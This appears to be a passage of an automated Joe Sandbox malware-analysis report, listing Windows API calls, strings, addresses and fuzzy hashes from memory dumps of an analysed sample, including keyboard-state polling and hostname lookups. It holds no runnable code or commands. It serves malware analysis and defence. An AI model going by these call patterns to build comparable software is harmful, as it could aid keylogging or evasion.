                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                             • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: SendString$_memmove
                                                            • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                            • API String ID: 2279737902-1007645807
                                                            • Opcode ID: f8346b57e8204650944360bb8a694fcbc7363161842787820b58c16961621f93
                                                            • Instruction ID: 95bebd27972828656ee60e84395b6332cc57eccaac34056fb84b96ca983d5bcd
                                                            • Opcode Fuzzy Hash: f8346b57e8204650944360bb8a694fcbc7363161842787820b58c16961621f93
                                                            • Instruction Fuzzy Hash: 6211B6209B026979D720A661CC4ADFF7B7CEFA3B04F4405A9B801920D2DF710E19C9A5
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                             • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                            • String ID: 0.0.0.0
                                                            • API String ID: 208665112-3771769585
                                                            • Opcode ID: bf7d238649ae54e467299ce4caed2f6f4c21e8019e07a0797a03c78fa2b8257b
                                                            • Instruction ID: afea599414a6f7c569d60574465301e2ee347fcdc9a5de1a4ec08f475e1098a4
                                                            • Opcode Fuzzy Hash: bf7d238649ae54e467299ce4caed2f6f4c21e8019e07a0797a03c78fa2b8257b
                                                            • Instruction Fuzzy Hash: B7110571914219BBCB20FB60AD0AFDF77BC9B11710F0041BAF504960A2EF70DA918A91
                                                            APIs
                                                            • timeGetTime.WINMM ref: 0020521C
                                                              • Part of subcall function 001C0719: timeGetTime.WINMM(?,75C0B400,001B0FF9), ref: 001C071D
                                                            • Sleep.KERNEL32(0000000A), ref: 00205248
                                                            • EnumThreadWindows.USER32(?,Function_000651CA,00000000), ref: 0020526C
                                                            • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0020528E
                                                            • SetActiveWindow.USER32 ref: 002052AD
                                                            • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 002052BB
                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 002052DA
                                                            • Sleep.KERNEL32(000000FA), ref: 002052E5
                                                            • IsWindow.USER32 ref: 002052F1
                                                            • EndDialog.USER32(00000000), ref: 00205302
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                             • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                            • String ID: BUTTON
                                                            • API String ID: 1194449130-3405671355
                                                            • Opcode ID: f480748f7812ef848f6e02c06107e4308f602d21502a764297f6fe07afd497c0
                                                            • Instruction ID: a13d1747fb5e0521dd8a38c6540b980f359171ffda2dcafab3b07251bc468c69
                                                            • Opcode Fuzzy Hash: f480748f7812ef848f6e02c06107e4308f602d21502a764297f6fe07afd497c0
                                                            • Instruction Fuzzy Hash: BF218E70214706BFE7105FB0FE9DE263B69EF5534AF8064B8F806811B2DBA19C258E21
APIs
  • Part of subcall function 001A9997: __itow.LIBCMT ref: 001A99C2
  • Part of subcall function 001A9997: __swprintf.LIBCMT ref: 001A9A0C
• CoInitialize.OLE32(00000000), ref: 0020D855
• SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0020D8E8
• SHGetDesktopFolder.SHELL32(?), ref: 0020D8FC
• CoCreateInstance.OLE32(00232D7C,00000000,00000001,0025A89C,?), ref: 0020D948
• SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0020D9B7
• CoTaskMemFree.OLE32(?,?), ref: 0020DA0F
• _memset.LIBCMT ref: 0020DA4C
• SHBrowseForFolderW.SHELL32(?), ref: 0020DA88
• SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0020DAAB
• CoTaskMemFree.OLE32(00000000), ref: 0020DAB2
• CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0020DAE9
• CoUninitialize.OLE32(00000001,00000000), ref: 0020DAEB
Memory Dump Source
• Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
• Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
Similarity
• API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
• String ID:
• API String ID: 1246142700-0
• Opcode ID: 2db30dde2dc3e8a30725495df28594f302a415a9b307e2df8f8c3253cce85d2c
• Instruction ID: eded5fe9c76510eed2bf1cdabaac0acc37bcf93f5d2b34839559add601091119
• Opcode Fuzzy Hash: 2db30dde2dc3e8a30725495df28594f302a415a9b307e2df8f8c3253cce85d2c
• Instruction Fuzzy Hash: 7DB11D75A10209AFDB14DFA4C888EAEBBF9FF49314B148469F905EB261DB30ED41CB50
APIs
• GetKeyboardState.USER32(?), ref: 002005A7
• SetKeyboardState.USER32(?), ref: 00200612
• GetAsyncKeyState.USER32(000000A0), ref: 00200632
• GetKeyState.USER32(000000A0), ref: 00200649
• GetAsyncKeyState.USER32(000000A1), ref: 00200678
• GetKeyState.USER32(000000A1), ref: 00200689
• GetAsyncKeyState.USER32(00000011), ref: 002006B5
• GetKeyState.USER32(00000011), ref: 002006C3
• GetAsyncKeyState.USER32(00000012), ref: 002006EC
• GetKeyState.USER32(00000012), ref: 002006FA
• GetAsyncKeyState.USER32(0000005B), ref: 00200723
• GetKeyState.USER32(0000005B), ref: 00200731
Memory Dump Source
• Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
• Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
Similarity
• API ID: State$Async$Keyboard
• String ID:
• API String ID: 541375521-0
• Opcode ID: 6aa2c064f944c3a69bfb26605d26a63df90ba616e982c8468b8238ee312d9d58
• Instruction ID: 3d895359b6e13ade9d95340e7667f40f0cd725655a79e577772c5f10d265fdd6
• Opcode Fuzzy Hash: 6aa2c064f944c3a69bfb26605d26a63df90ba616e982c8468b8238ee312d9d58
• Instruction Fuzzy Hash: 5D510930A1478929FB34DFA088947EAFFB59F01380F484599D5C2561C3DA64AB6CCF61
APIs
• GetDlgItem.USER32(?,00000001), ref: 001FC746
• GetWindowRect.USER32(00000000,?), ref: 001FC758
• MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 001FC7B6
• GetDlgItem.USER32(?,00000002), ref: 001FC7C1
• GetWindowRect.USER32(00000000,?), ref: 001FC7D3
• MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 001FC827
• GetDlgItem.USER32(?,000003E9), ref: 001FC835
• GetWindowRect.USER32(00000000,?), ref: 001FC846
• MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 001FC889
• GetDlgItem.USER32(?,000003EA), ref: 001FC897
• MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 001FC8B4
• InvalidateRect.USER32(?,00000000,00000001), ref: 001FC8C1
Memory Dump Source
• Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
• Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
Similarity
• API ID: Window$ItemMoveRect$Invalidate
• String ID:
• API String ID: 3096461208-0
• Opcode ID: c5fd8948d8c3eaea3ca2426e38d446103f78f3b21790d7ee4ba0c01de7545c7b
• Instruction ID: c44e6079e2481b0080507e5a1781225f6e5e48409a91b2438df55386ca865afd
• Opcode Fuzzy Hash: c5fd8948d8c3eaea3ca2426e38d446103f78f3b21790d7ee4ba0c01de7545c7b
• Instruction Fuzzy Hash: 4D512471B00209BBDB18CFA9DE99ABEBBB9EB88711F14813DF615D7290D7709D018B50
APIs
  • Part of subcall function 001A1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,001A2036,?,00000000,?,?,?,?,001A16CB,00000000,?), ref: 001A1B9A
• DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 001A20D3
• KillTimer.USER32(-00000001,?,?,?,?,001A16CB,00000000,?,?,001A1AE2,?,?), ref: 001A216E
• DestroyAcceleratorTable.USER32(00000000), ref: 001DBEF6
• ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,001A16CB,00000000,?,?,001A1AE2,?,?), ref: 001DBF27
• ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,001A16CB,00000000,?,?,001A1AE2,?,?), ref: 001DBF3E
• ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,001A16CB,00000000,?,?,001A1AE2,?,?), ref: 001DBF5A
• DeleteObject.GDI32(00000000), ref: 001DBF6C
Memory Dump Source
• Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
• Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
Similarity
• API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
• String ID:
• API String ID: 641708696-0
• Opcode ID: b3a3e4cd3dbfcfd7eb0239b4b3701137d0dea5d055c80e46b2f0e919004484d6
• Instruction ID: f2ab51ff59c825b1c06310dc5569ee44f39dceea3350274d8293c4b2a43a5781
• Opcode Fuzzy Hash: b3a3e4cd3dbfcfd7eb0239b4b3701137d0dea5d055c80e46b2f0e919004484d6
• Instruction Fuzzy Hash: 05619C38104611EFCB399F28EE8CB29B7F1FB41316F118529E44287AA0C7B5A895DF90
APIs
  • Part of subcall function 001A25DB: GetWindowLongW.USER32(?,000000EB), ref: 001A25EC
• GetSysColor.USER32(0000000F), ref: 001A21D3
Memory Dump Source
• Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
• Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
Similarity
• API ID: ColorLongWindow
• String ID:
• API String ID: 259745315-0
• Opcode ID: c1613eb5fc548f916753340f7aedaaa4c4bba1cbc10d8dad92bf5b3055dd6b5d
• Instruction ID: 8b6acf1cc3ba5f0b7af971e3bcd6a5ef2491fca4d915746774d51b9a9233ca50
• Opcode Fuzzy Hash: c1613eb5fc548f916753340f7aedaaa4c4bba1cbc10d8dad92bf5b3055dd6b5d
• Instruction Fuzzy Hash: 3141AD35100150EFDB255F6CED88BB93B66EB07331F684266FD658A2E2C7318C82DB61
APIs
• CharLowerBuffW.USER32(?,?,0022F910), ref: 0020AB76
• GetDriveTypeW.KERNEL32(00000061,0025A620,00000061), ref: 0020AC40
• _wcscpy.LIBCMT ref: 0020AC6A
Strings
Memory Dump Source
• Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
• Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
Similarity
• API ID: BuffCharDriveLowerType_wcscpy
• String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
• API String ID: 2820617543-1000479233
• Opcode ID: 33f35272921492d7c8314682138828d2a312289d8b501c996627725f87d5e3c9
• Instruction ID: 97ad5646f5024e5c0b3c99e33aca59b3422a82be4f5261b4dce2fa1b80be633c
• Opcode Fuzzy Hash: 33f35272921492d7c8314682138828d2a312289d8b501c996627725f87d5e3c9
• Instruction Fuzzy Hash: 3751CF341283029BC710EF14C882EAEB7A5EFA5314F90492DF896572E2DB31DE59CB53
APIs
  • Part of subcall function 001A2612: GetWindowLongW.USER32(?,000000EB), ref: 001A2623
  • Part of subcall function 001A2344: GetCursorPos.USER32(?), ref: 001A2357
  • Part of subcall function 001A2344: ScreenToClient.USER32(002667B0,?), ref: 001A2374
  • Part of subcall function 001A2344: GetAsyncKeyState.USER32(00000001), ref: 001A2399
  • Part of subcall function 001A2344: GetAsyncKeyState.USER32(00000002), ref: 001A23A7
• ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 0022C2E4
• ImageList_EndDrag.COMCTL32 ref: 0022C2EA
• ReleaseCapture.USER32 ref: 0022C2F0
• SetWindowTextW.USER32(?,00000000), ref: 0022C39A
• SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0022C3AD
• DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 0022C48F
Strings
Memory Dump Source
• Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
• Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
Similarity
• API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
• String ID: @GUI_DRAGFILE$@GUI_DROPID$pr&$pr&
• API String ID: 1924731296-1389161382
• Opcode ID: c86282a40a04e4d6cc027252c23a1bb3d620298eba831f61063bfb1b28533531
• Instruction ID: 592a5448c3fed929642b17885630cc73dedd29aecf4beae4af1339f7c56d3a25
• Opcode Fuzzy Hash: c86282a40a04e4d6cc027252c23a1bb3d620298eba831f61063bfb1b28533531
• Instruction Fuzzy Hash: DA51BD34214301AFD710EF64EC99F6A7BF5EB98310F10852DF9918B2E1DB71A968CB52
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
• Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
Similarity
• API ID: __i64tow__itow__swprintf
• String ID: %.15g$0x%p$False$True
• API String ID: 421087845-2263619337
• Opcode ID: d13b2da7aa644939e314fd148934cd06c129001ffbca28c8b47fad55e595a1f1
• Instruction ID: ac3518aa3acba82c9b692b100ba09955b8149f8da5f17fcd76de625817a57243
• Opcode Fuzzy Hash: d13b2da7aa644939e314fd148934cd06c129001ffbca28c8b47fad55e595a1f1
• Instruction Fuzzy Hash: EF41B175A04205AFDB289B38DC42F7A73E8AB56314F20446EF54AD7291EB71DA82CB11
APIs
• _memset.LIBCMT ref: 002273D9
• CreateMenu.USER32 ref: 002273F4
• SetMenu.USER32(?,00000000), ref: 00227403
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00227490
• IsMenu.USER32(?), ref: 002274A6
• CreatePopupMenu.USER32 ref: 002274B0
• InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 002274DD
• DrawMenuBar.USER32 ref: 002274E5
Strings
Memory Dump Source
• Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
• Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
Similarity
• API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
• String ID: 0$F
• API String ID: 176399719-3044882817
• Opcode ID: e976e6b34979d5261656716abf5f428aad0ab7d9c33ca37c2a952765e8adf28b
• Instruction ID: d39ab4a72e519be5ef372bd8435ed59436806bb1a4e9585a9e92800fd38199ae
• Opcode Fuzzy Hash: e976e6b34979d5261656716abf5f428aad0ab7d9c33ca37c2a952765e8adf28b
• Instruction Fuzzy Hash: 2F415A75A14216EFDB20EFA4E988E9ABBB9FF49310F144028F95597360DB71A920CB50
                                                            APIs
                                                            • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 002277CD
                                                            • CreateCompatibleDC.GDI32(00000000), ref: 002277D4
                                                            • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 002277E7
                                                            • SelectObject.GDI32(00000000,00000000), ref: 002277EF
                                                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 002277FA
                                                            • DeleteDC.GDI32(00000000), ref: 00227803
                                                            • GetWindowLongW.USER32(?,000000EC), ref: 0022780D
                                                            • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00227821
                                                            • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 0022782D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                            • String ID: static
                                                            • API String ID: 2559357485-2160076837
                                                            • Opcode ID: 1811299eb46de98a9205969a6e77cad434537159bfad378a21e03e6b56b9ab22
                                                            • Instruction ID: c53fea0f9751a5a96a8774c40b1e3288c4dfcbfc446fe1745b1038ab73004243
                                                            • Opcode Fuzzy Hash: 1811299eb46de98a9205969a6e77cad434537159bfad378a21e03e6b56b9ab22
                                                            • Instruction Fuzzy Hash: 78316C31115126BBDF229FE4EC0CFEA3B79EF09720F110225FA15A60A0D775D822DBA4
                                                            APIs
                                                            • _memset.LIBCMT ref: 001C707B
                                                              • Part of subcall function 001C8D68: __getptd_noexit.LIBCMT ref: 001C8D68
                                                            • __gmtime64_s.LIBCMT ref: 001C7114
                                                            • __gmtime64_s.LIBCMT ref: 001C714A
                                                            • __gmtime64_s.LIBCMT ref: 001C7167
                                                            • __allrem.LIBCMT ref: 001C71BD
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 001C71D9
                                                            • __allrem.LIBCMT ref: 001C71F0
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 001C720E
                                                            • __allrem.LIBCMT ref: 001C7225
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 001C7243
                                                            • __invoke_watson.LIBCMT ref: 001C72B4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                            • String ID:
                                                            • API String ID: 384356119-0
                                                            • Opcode ID: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                                                            • Instruction ID: 2f07a3b344f46e148d5233d9a102e87e1dfa860adb3306c5ae93bad84e90037d
                                                            • Opcode Fuzzy Hash: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                                                            • Instruction Fuzzy Hash: D571C771A04716ABD714AE79CC42F6AB3B8AF31324F14422EF914E67C1E7B0E9508F91
                                                            APIs
                                                            • _memset.LIBCMT ref: 00202A31
                                                            • GetMenuItemInfoW.USER32(00266890,000000FF,00000000,00000030), ref: 00202A92
                                                            • SetMenuItemInfoW.USER32(00266890,00000004,00000000,00000030), ref: 00202AC8
                                                            • Sleep.KERNEL32(000001F4), ref: 00202ADA
                                                            • GetMenuItemCount.USER32(?), ref: 00202B1E
                                                            • GetMenuItemID.USER32(?,00000000), ref: 00202B3A
                                                            • GetMenuItemID.USER32(?,-00000001), ref: 00202B64
                                                            • GetMenuItemID.USER32(?,?), ref: 00202BA9
                                                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00202BEF
                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00202C03
                                                            • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00202C24
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                            • String ID:
                                                            • API String ID: 4176008265-0
                                                            • Opcode ID: 3150065839accfb46431d4939544591da642305cd011ba474fdf6f34513cfd35
                                                            • Instruction ID: e146e0390466ecb7acfa5a6015d38747e09cb8193d13e2fb99944f1fefdc77a0
                                                            • Opcode Fuzzy Hash: 3150065839accfb46431d4939544591da642305cd011ba474fdf6f34513cfd35
                                                            • Instruction Fuzzy Hash: B36197B051034AEFDB21CF54DD8CEAEBB78EB41304F14455BE84197292D7719D69DB20
                                                            APIs
                                                            • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00227214
                                                            • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00227217
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0022723B
                                                            • _memset.LIBCMT ref: 0022724C
                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0022725E
                                                            • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 002272D6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
